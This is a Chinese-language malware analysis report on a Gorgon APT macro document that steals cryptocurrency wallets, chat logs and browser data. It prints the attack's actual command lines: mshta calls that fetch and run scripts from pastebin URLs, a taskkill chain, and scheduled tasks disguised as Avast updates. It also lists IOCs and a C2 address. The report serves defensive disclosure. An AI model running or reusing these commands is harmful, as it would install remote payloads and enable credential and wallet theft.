後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包
背景
Gorgon APT組織是一個被認為來自巴基斯坦的攻擊組織,該組織在2018年8月份由Palo Alto Unit42團隊進行披露,主要針對全球外貿人士進行攻擊。除此之外,安全研究人員還發現Gorgon針對英國、西班牙、俄羅斯、美國等政府目標發起了攻擊,算是APT組織的後起之秀,最近一年非常活躍。
近日,深信服安全團隊發現了Gorgon APT組織最新變種樣本,此樣本釋放了一個盜取受害者虛擬幣錢包的木馬。
/攻擊流程圖/
樣本分析
1.樣本中包含惡意的巨集程式碼,如下所示:
2.通過動態除錯,巨集程式碼呼叫mshta.exe執行mshta http://bitly.com/6xdfsSXsh6,訪問短連結網址http://bitly.com/6xdfsSXsh6,如下所示:
3.短連結跳轉到網站:https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html,網站包含惡意指令碼,如下所示:
4.解密裡面的惡意指令碼,如下所示:
5.呼叫mshta.exe執行mshta.exe http://www.pastebin.com/raw/UZEbWMK9,訪問http://www.pastebin.com/raw/UZEbWMK9網站的內容,如下所示:
6.解密上面的惡意指令碼內容,如下所示:
7.呼叫cmd.exe程式,執行如下命令,結束相關程式:
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
8.將以下命令,寫入自啟動登錄檔項:
mshta.exe http://pastebin.com/raw/hJjQuQv1
9.通過命令,建立兩個計劃任務啟動項Avast Updater和Avast backup,如下所示:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/BrH6UFRc" /F
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exe http://pastebin.com/raw/nhcP3XgH" /F
10.上面三個自啟動項,分別執行三個不同的指令碼,如下所示:
http://pastebin.com/raw/hJjQuQv1
http://pastebin.com/raw/BrH6UFRc
http://pastebin.com/raw/nhcP3XgH
hJjQuQv1指令碼解密之後,如下所示:
BrH6UFRc指令碼解密之後,如下所示:
再次解密指令碼,如下所示:
11.下載https://pastebin.com/raw/dkrjWec2指令碼並執行,指令碼內容,如下所示:
解密指令碼之後,如下所示:
12.解密之後替換裡面的字串,然後載入執行,如下所示:
13.替換之後,是一個PE檔案,如下所示:
14.通過檢視這個PE檔案為NET編寫的注入程式,如下所示:
15.將PE程式注入到calc.exe程式中,下載https://pastebin.com/raw/j8mRken0指令碼內容,然後替換裡面的@!並執行,指令碼內容,如下所示: 
16.解密指令碼之後也是一個PE檔案,如下所示:
17.把這個解密出來的PE程式通過上面解密出來的PE注入程式,注入到calc.exe程式中,此PE程式,盜取受害者虛擬錢包資料,例如比特幣,萊特幣等,如下所示: 
18.盜取受害者聊天工具記錄,例如:Skype、Telegram等,如下所示:
19.螢幕截圖操作,如下所示: 
20.獲取受害者主機相關資訊,當前IP地址或區域資訊以及磁碟檔名等,如下所示: 
21.盜取受害者瀏覽器歷史記錄資訊等,如下所示:
22.遠端伺服器URL:http://216.170.126.139/Panel/10/index.php,捕獲到的資料包流量,如下所示:
23.nhcP3XgH指令碼解密之後,如下所示:
安全建議
不管攻擊者的入侵計劃是多麼的縝密,總會由於技術的限制留下些許蛛絲馬跡,譬如軟體的植入、網路流量的產生,這些痕跡可能並不足以作為APT攻擊的證據,但一旦發現,就必須提高警惕,並及時的儲存現場,通知安全相關人員,對疑似感染的主機進行隔離和檢查。同時也要注意日常防範措施,在思想上和技術上雙管齊下:
1、加強人員安全防範意識。不要開啟來歷不明的郵件附件,對於郵件附件中的檔案要謹慎執行,如發現指令碼或其他可執行檔案可先使用防毒軟體進行掃描;
2、升級office系列軟體到最新版本,不要隨意執行不可信文件中的巨集;
3、部署分層控制,實現深度網路安全防禦,構建端到端的立體安全防護網路。在網路規劃時需要充分考慮終端接入安全、內網安全防護、應用系統安全等多個維度,並根據不同的業務需求和安全等級進行合理的分割槽隔離;
4、重視網路資料、系統執行狀態的審計和分析。嚴格把控系統的訪問許可權,持續對資料流的進出進行有效的監控,及時更新安全補丁,定時進行安全配置基線的審視和系統安全風險的評估,及時發現可以行為並通過通訊線路加密、應用層安全掃描與防護、隔離等有效技術手段將可能的安全風險扼殺在搖籃裡。
IOCs
MD5:
A137185171B1176FC125A74250928933
A5DE91F73A5E75AA7E33954FD0ADDA13
E0CE8A86F85C506591BE8897C07FB626
URL:
http://bitly.com/6xdfsSXsh6
https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html
http://www.pastebin.com/raw/UZEbWMK9
http://pastebin.com/raw/hJjQuQv1
http://pastebin.com/raw/BrH6UFRc
http://pastebin.com/raw/nhcP3XgH
http://216.170.126.139/Panel/10/index.php
IP :
216.170.126.139
相關文章
- APT黑客組織Lazarus再度活躍,這次盯上了數字貨幣APT黑客
- 起底數字貨幣的覬覦者Lazarus(APT-C-26),長達十三年“環環相扣”的暗黑風暴狂潮APT
- 微軟將朝鮮黑客組織告上法庭——以法律之劍,斬APT組織之鏈微軟黑客APT
- APT組織檔案館|2021年度APT組織活動態勢分析APT
- 為了挖掘加密貨幣 兩個黑客組織爭奪Linux伺服器加密黑客Linux伺服器
- [譯] 數字貨幣錢包詳解
- 澳洲中學組織加密貨幣資訊之夜加密
- 虛擬貨幣戰爭:比特幣讓位以太幣?比特幣
- 錢包被黑客入侵後,IOTA 加密貨幣關閉了整個網路黑客加密
- APT組織跟蹤與溯源APT
- 小心被忽悠,一文分清虛擬貨幣、數字貨幣、加密貨幣和代幣加密
- 《網際網路週刊》:Facebook怎麼賺錢:廣告、佣金和虛擬貨幣
- 當出行獨角獸開始“覬覦”兩輪自動駕駛自動駕駛
- 6 個開源的數字貨幣錢包
- 區塊鏈錢包開發,數字貨幣錢包開發的型別區塊鏈型別
- 黑客盜取《劍網3》虛擬貨幣60億?西山居:bug已修復黑客
- 日本加密貨幣交易所申請組建自律組織加密
- 黑客攻擊 Electrum 錢包竊取到 200 多比特幣黑客比特幣
- 境外“暗駭客棧”組織對國內企業高管發起APT攻擊APT
- CFTC委員支援Winklevoss兄弟成立加密貨幣自律組織加密
- 國家級黑客組織“海蓮花” 攻陷寶馬,汽車工業成APT新目標黑客APT
- 神祕黑客三年來一直向APT組織提供Windows 零日漏洞黑客APTWindows
- 數字貨幣TP錢包/ImToken錢包/MetaMask小狐狸錢包系統開發(開發流程)丨原始碼分析原始碼
- 黑吃黑——黑客組織通過黑客工具攻擊其他黑客黑客
- 俄羅斯支援的DNC黑客組織對華盛頓智庫發起攻擊黑客
- 經合組織:加密貨幣稅收政策需要全球共識加密
- 黑客組織瞄準美國電網黑客
- 韓國金融監管機構釋出更嚴格的虛擬貨幣反洗錢準則
- 數字貨幣錢包系統組成架構及開發原始碼編寫思路分析架構原始碼
- 鮮衣怒馬散盡千金,Vue3.0+Tornado6前後端分離整合Web3.0之Metamask錢包區塊鏈虛擬貨幣三方支付功能Vue後端Web區塊鏈
- 區塊鏈錢包系統開發,數字貨幣高頻搬磚錢包app開發區塊鏈APP
- 伊朗APT組織的失誤之舉:欲蓋彌彰的自建VPNAPT
- 德國官員稱俄羅斯黑客組織APT28去年對其發動網路攻擊黑客APT
- TransparentTribe APT組織最新樣本分析報告APT
- "Cyrus"APT組織:"SideWinder(響尾蛇)"的兄弟APTIDE
- 卡巴斯基:Lazarus黑客組織開發針對加密貨幣交易所的MacOS惡意軟體黑客加密Mac
- 神祕黑客組織攻擊美國政府,背後或為俄羅斯黑客
- 一駭客組織宣戰IS稱截獲相關網路錢包